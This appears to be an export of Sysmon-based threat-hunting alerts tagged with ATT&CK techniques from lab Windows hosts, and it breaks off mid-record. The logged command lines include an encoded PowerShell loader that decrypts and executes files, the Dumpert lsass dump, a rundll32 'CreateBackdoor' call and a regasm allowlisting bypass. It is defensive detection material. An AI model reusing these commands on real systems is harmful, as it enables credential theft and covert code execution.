2019-03-17 20:18:09.593 365ABB72-AB81-5C8E-0000-00102E9E0C00 3892 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding C:\Windows\system32\ PC04\IEUser 365ABB72-A960-5C8E-0000-002004C00300 0x3c004 1 High MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-173D-5C8F-0000-00102A6A0000 608 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name ),1," 1 5 4 1 0 0x8000000000000000 5880 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.070 365ABB72-3D6D-5CEB-0000-0010575CFF00 2644 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 23 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:14.781 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\vaultcli.dll 6.1.7600.16385 (win7_rtm.090713-1255) Credential Vault Client Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 17286 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-13 18:03:19.482 365ABB72-B167-5CD9-0000-0010EE150C00 2372 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation /c notepad.exe C:\Windows\system32\ IEWIN7\IEUser 365ABB72-B0EC-5CD9-0000-0020DE330100 0x133de 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0EC-5CD9-0000-0010D9D20000 944 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243547 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.122 747F3D96-9F69-5E75-0000-0010DE732000 6400 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 23 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:14.781 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\vaultcli.dll 6.1.7600.16385 (win7_rtm.090713-1255) Credential Vault Client Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243547 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.122 747F3D96-9F69-5E75-0000-0010DE732000 6400 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243547 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.122 747F3D96-9F69-5E75-0000-0010DE732000 6400 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," 8 2 4 8 0 0x8000000000000000 9060 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 12:43:43.784 365ABB72-4055-5CC8-0000-0010769D0B00 1532 \\VBOXSVR\HTools\voice_mail.msg.exe 365ABB72-3FE0-5CC8-0000-00107E590000 492 C:\Windows\System32\lsass.exe 1744 0x001A0000 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4923 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:34.234 747F3D96-662E-5D3F-0000-0010C2048900 1976 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1," 1 5 4 1 0 0x8000000000000000 244336 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 12:35:55.872 747F3D96-0A2B-5E76-0000-0010C02A3D00 7072 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net.exe net start CDPSvc C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-06A4-5E76-0000-002043DE0200 0x2de43 1 High SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-077C-5E76-0000-0010A5BA2300 5068 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath ),1," 1 5 4 1 0 0x8000000000000000 5877 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:16.960 365ABB72-3D6C-5CEB-0000-00107257FF00 3484 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1," 1 5 4 1 0 0x8000000000000000 238378 Microsoft-Windows-Sysmon/Operational alice.insecurebank.local 2019-06-21 07:35:50.093 ECAD0485-88D6-5D0C-0000-001007AA1D00 1568 C:\Windows\System32\rundll32.exe 6.3.9600.17415 (winblue_r4.141028-1500) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump C:\Users\administrator\Desktop\x64\ insecurebank\Administrator ECAD0485-87E3-5D0C-0000-0020266A0F00 0xf6a26 2 High SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C ECAD0485-8897-5D0C-0000-0010A2FA1C00 3964 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," 1 5 4 1 0 0x8000000000000000 238378 Microsoft-Windows-Sysmon/Operational alice.insecurebank.local 2019-06-21 07:35:50.093 ECAD0485-88D6-5D0C-0000-001007AA1D00 1568 C:\Windows\System32\rundll32.exe 6.3.9600.17415 (winblue_r4.141028-1500) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump C:\Users\administrator\Desktop\x64\ insecurebank\Administrator ECAD0485-87E3-5D0C-0000-0020266A0F00 0xf6a26 2 High SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C ECAD0485-8897-5D0C-0000-0010A2FA1C00 3964 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," 1 5 4 1 0 0x8000000000000000 238378 Microsoft-Windows-Sysmon/Operational alice.insecurebank.local 2019-06-21 07:35:50.093 ECAD0485-88D6-5D0C-0000-001007AA1D00 1568 C:\Windows\System32\rundll32.exe 6.3.9600.17415 (winblue_r4.141028-1500) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump C:\Users\administrator\Desktop\x64\ insecurebank\Administrator ECAD0485-87E3-5D0C-0000-0020266A0F00 0xf6a26 2 High SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C ECAD0485-8897-5D0C-0000-0010A2FA1C00 3964 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 32151 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-30 12:54:07.823 747F3D96-1C6F-5D69-0000-0010323C1F00 2576 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript c:\ProgramData\memdump.vbs notepad.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1B6A-5D69-0000-0020E5810E00 0xe81e5 1 High SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 747F3D96-1B6C-5D69-0000-00106F060F00 2128 C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4922 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:34.216 747F3D96-662E-5D3F-0000-001011038900 6020 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c del /q 